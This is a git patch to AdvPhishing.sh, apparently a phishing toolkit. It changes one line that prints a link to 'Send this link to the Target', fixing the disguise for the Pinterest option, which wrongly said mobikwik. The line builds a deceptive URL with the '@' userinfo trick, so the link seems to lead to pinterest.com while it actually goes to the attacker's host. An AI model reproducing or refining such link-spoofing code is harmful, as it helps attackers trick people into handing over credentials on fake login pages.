From 311911f40091df78471a48803aa50a1ec7f699fa Mon Sep 17 00:00:00 2001 From: Harish Sekar <63995684+Progluver@users.noreply.github.com> Date: Mon, 3 May 2021 10:05:38 +0530 Subject: [PATCH] Modified Pinterest's URL The modified url of pinterest had mobikwik in it instead of pinterest so changed it. --- AdvPhishing.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/AdvPhishing.sh b/AdvPhishing.sh index 0fe939d0..d971831d 100644 --- a/AdvPhishing.sh +++ b/AdvPhishing.sh @@ -1576,7 +1576,7 @@ echo "" if [[ $option == *'Y'* ]] || [[ $option == *'y'* ]] then echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > >\e[0m' - printf "\e[1;33m\e[0m\e[1;33m Send this link to the Target :\e[0m\e[1;77m %s\e[0m\n" https://www.mobikwik.com-@$link + printf "\e[1;33m\e[0m\e[1;33m Send this link to the Target :\e[0m\e[1;77m %s\e[0m\n" https://www.pinterest.com-@$link echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > > >\e[0m' else echo -e $'\e[1;33m\e[0m\e[1;77m\e[0m\e[1;33m\e[0m\e[1;96m ------------------------- > > > > > >\e[0m'